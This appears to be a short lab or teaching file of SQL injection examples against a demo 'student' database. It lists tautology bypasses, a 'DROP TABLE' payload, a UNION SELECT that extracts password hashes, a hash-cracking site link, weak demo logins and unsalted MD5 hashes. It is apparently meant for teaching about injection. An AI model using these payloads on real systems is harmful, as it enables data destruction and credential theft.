--
-- SQL injection examples
--
search doe' OR 1=1) -- !  
search doe' OR 1=1) OR 1=1 -- !  

search doe'; DROP TABLE student; -- !

search doe' OR 1=1) UNION SELECT name, password, password_hash FROM student; -- !

https://crackstation.net/

login bobby@tables.com bobby
login john@doe.com john
login jane@doe.com jane
login admin@school.com admin

a9c4cef5735770e657b7c25b9dcb807b
527bd5b5d689e2c32ae974c6229ff785
5844a15e76563fedd11840fd6f40ea7b
21232f297a57a5a743894a0e4a801fc3
